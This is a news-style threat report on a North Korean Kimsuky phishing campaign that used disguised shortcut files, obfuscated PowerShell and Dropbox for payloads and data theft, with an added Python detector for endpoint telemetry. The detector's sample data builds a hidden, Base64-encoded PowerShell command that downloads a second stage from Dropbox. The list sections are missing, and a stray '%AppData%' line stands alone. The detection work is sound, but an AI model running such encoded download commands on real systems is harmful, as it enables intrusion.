A recent cyberattack campaign, dubbed “DEEP#DRIVE,” has been attributed to the North Korean Advanced Persistent Threat (APT) group, Kimsuky.
The operation, targeting South Korean businesses, government entities, and cryptocurrency users, employs advanced techniques involving Dropbox-hosted payloads and obfuscated PowerShell scripts to infiltrate systems and exfiltrate sensitive data.
The attackers utilized phishing emails containing malicious shortcut files (.lnk) disguised as legitimate documents, such as work logs and insurance forms.
These files exploited a common Windows behavior of hiding file extensions to trick users into executing malicious code.
Once opened, the .lnk files triggered PowerShell scripts that downloaded additional payloads from Dropbox, a trusted cloud storage platform.
This tactic allowed the attackers to bypass traditional security defenses by blending their activities with normal user behavior.
Key to the campaign’s success was its reliance on Dropbox for both payload delivery and data exfiltration.
By leveraging OAuth token-based authentication for Dropbox API interactions, the attackers seamlessly uploaded reconnaissance data, including system configurations and running processes, to designated folders.
The infrastructure was dynamic and short-lived, with critical Dropbox links being rapidly deactivated to evade detection and complicate analysis.
The DEEP#DRIVE campaign followed a sophisticated multi-stage attack chain:
The attackers employed various obfuscation techniques, such as Base64 encoding and junk code insertion, to evade detection by antivirus software and logging systems.
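The behaviours described above (a document-lookalike shortcut with a hidden double extension, a hidden-window PowerShell launched from Explorer, a Base64-encoded command that pulls a stage from a Dropbox host) each leave a mark in endpoint telemetry. The following detector is an added example written for this article, not code from Securonix or from the campaign; it runs over constructed Sysmon-style JSON events (labelled as such in the code), decodes any `-EncodedCommand` argument the way PowerShell does (Base64 of UTF-16LE) and reports which of those indicators each event shows. The event field names, sample paths and the placeholder Dropbox URL are assumptions for illustration.

```python
import base64
import json
import re

# Dropbox API and content hosts; a PowerShell command referencing them right
# after a shortcut was opened is the delivery pattern the article describes.
DROPBOX_HOSTS = ("dropboxapi.com", "dl.dropboxusercontent.com", "www.dropbox.com")

# Common PowerShell download cradles (cmdlets and their aliases).
DOWNLOAD_CRADLES = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b", re.I)

# A shortcut named like a document: "work_log.pdf.lnk" shows as "work_log.pdf"
# when Windows hides known extensions.
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|hwp|txt)\.lnk$", re.I)

# -EncodedCommand and its accepted abbreviations, followed by the Base64 blob.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before Base64.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the list of indicator names present in one telemetry record."""
    findings = []
    if DOUBLE_EXT_LNK.search(event.get("TargetFilename", "")):
        findings.append("document-lookalike shortcut (double extension .lnk)")

    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return findings

    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("explorer.exe") and HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden-window powershell spawned by explorer.exe")

    plaintext = decode_encoded_command(cmdline)
    if plaintext is not None:
        findings.append("encoded powershell command")
    # Inspect both the raw command line and the decoded script.
    text = cmdline + " " + (plaintext or "")
    if DOWNLOAD_CRADLES.search(text):
        findings.append("download cradle")
    if any(host in text.lower() for host in DROPBOX_HOSTS):
        findings.append("dropbox host referenced")
    return findings


def scan(lines):
    """Parse JSON telemetry lines; return {line index: findings} for events with hits."""
    hits = {}
    for i, line in enumerate(lines):
        findings = analyse_event(json.loads(line))
        if findings:
            hits[i] = findings
    return hits


def _encode_ps(script):
    """Build the Base64/UTF-16LE form PowerShell expects (used only to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real captures. Paths, user names and the
# Dropbox URL path are placeholders.
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    json.dumps({"EventType": "FileCreate", "Image": "C:\\Windows\\explorer.exe",
                "TargetFilename": "C:\\Users\\user\\Downloads\\work_log_2025.pdf.lnk"}),
    json.dumps({"EventType": "ProcessCreate", "Image": PS_EXE,
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode_ps(
                    "iwr https://dl.dropboxusercontent.com/s/PLACEHOLDER/stage2.txt "
                    "-OutFile $env:AppData\\stage2.ps1")}),
    json.dumps({"EventType": "ProcessCreate", "Image": PS_EXE,
                "ParentImage": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"}),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(findings)}")
```

Each indicator on its own is weak (hidden-window PowerShell is common in benign automation), so the value is in correlating them per host within a short window: a double-extension shortcut written to a user folder, followed by an encoded PowerShell child of Explorer that reaches a Dropbox host, is the sequence worth alerting on. Decoding the Base64 before matching matters because the short-lived Dropbox links the article mentions never appear in the raw command line.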
The tactics, techniques, and procedures (TTPs) observed in DEEP#DRIVE align closely with previous campaigns attributed to Kimsuky.
Known for targeting South Korea, Kimsuky has a history of leveraging trusted platforms like Dropbox for malware distribution and data exfiltration.
According to Securonix, the use of Korean-language phishing lures further reinforces the assessment that South Korea was the primary target.
The campaign highlights the growing trend of threat actors exploiting trusted cloud services to bypass traditional security measures.
By using platforms like Dropbox, attackers can evade network-layer defenses and increase the likelihood of successful infiltration.
To mitigate such threats, organizations are advised to:
%AppData%
The DEEP#DRIVE campaign underscores the importance of vigilance in cybersecurity practices as threat actors continue to evolve their methods to exploit trusted platforms and evade detection.